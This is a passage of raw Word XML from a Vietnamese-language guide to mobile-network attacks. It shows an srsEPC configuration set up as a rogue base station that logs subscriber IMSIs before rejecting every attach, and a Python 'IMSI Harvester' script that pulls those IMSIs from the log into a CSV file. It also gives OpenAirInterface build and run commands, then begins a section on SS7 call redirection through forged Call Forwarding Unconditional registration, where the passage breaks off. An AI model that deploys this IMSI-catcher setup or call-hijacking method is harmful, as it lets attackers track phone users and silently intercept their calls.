        </w:rPr>
        <w:t xml:space="preserve">mme_group </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x0001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tac </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x0007</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mcc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">452</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mnc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">04</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mme_bind_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">apn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> internet</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[hss]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hss_hostname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/ue_imsi_capture.db</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">auth_algo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> milenage     # MILENAGE hoặc xor (test)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Không có UE được pre-provisioned → tất cả Attach bị Reject</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Nhưng IMSI được log trước khi reject</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[spgw]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gtpu_bind_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sgi_if_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.16.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[log]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">all_level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> debug         # Để bắt IMSI trong log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Script tự động hóa capture IMSI từ log:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">IMSI Harvester - parse srsEPC log để extract IMSI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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IMSI_PATTERN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NAS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">IMSI</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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{15}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ATTACH_PATTERN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MME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Attach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">IMSI</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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{15}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">captured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log_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/tmp/srsepc.log"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tail_log(filepath):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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Đến cuối file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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">yield</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> line</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                time.sleep(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0.01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"[*] Bắt đầu capture IMSI từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_file</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tail_log(log_file):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[IMSI_PATTERN, ATTACH_PATTERN]:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern.search(line)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> m:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            imsi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> m.group(</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imsi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> captured:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                captured.add(imsi)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                ts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> datetime.now().isoformat()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ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] NEW IMSI: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imsi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Ghi vào file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"/tmp/captured_imsi.csv"</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out:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    out.write(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="62" w:name="openairinterface-oai-phương-án-thay-thế"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 OpenAirInterface (OAI) – Phương Án Thay Thế</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OAI là bộ stack LTE/5G đầy đủ hơn srsRAN, được phát triển bởi EURECOM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://gitlab.eurecom.fr/oai/openairinterface5g.git</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> openairinterface5g</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> oaienv</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">./build_oai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> USRP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--eNB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--UE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Build với USRP support</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cấu hình eNB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> targets/PROJECTS/GENERIC-LTE-EPC/CONF/enb.band7.tm1.usrpb210.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   /tmp/enb.conf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Chỉnh sửa MCC/MNC/TAC cho phù hợp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Chạy</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./lte-softmodem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/enb.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--log_config.global_log_level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="69" w:name="ss7-call-redirection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. SS7 Call Redirection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="64" w:name="cơ-chế-supplementary-services"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Cơ Chế Supplementary Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các dịch vụ bổ sung (Supplementary Services) được lưu trữ trong HLR và được VLR/MSC tra cứu khi xử lý cuộc gọi. Cụ thể,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Call Forwarding Unconditional (CFU)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">với mã dịch vụ 21 là mục tiêu chính.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Luồng cuộc gọi bình thường:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Caller → GMSC → [HLR lookup: không có CFU] → MSC của Target → Ring Target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi tấn công RegisterSS CFU:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Caller → GMSC → [HLR lookup: CFU active, forward to +84XXXXXXXXX]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">              → Ngay lập tức chuyển hướng</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">              → Không bao giờ Ring Target</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="map-registerss-operation"/>
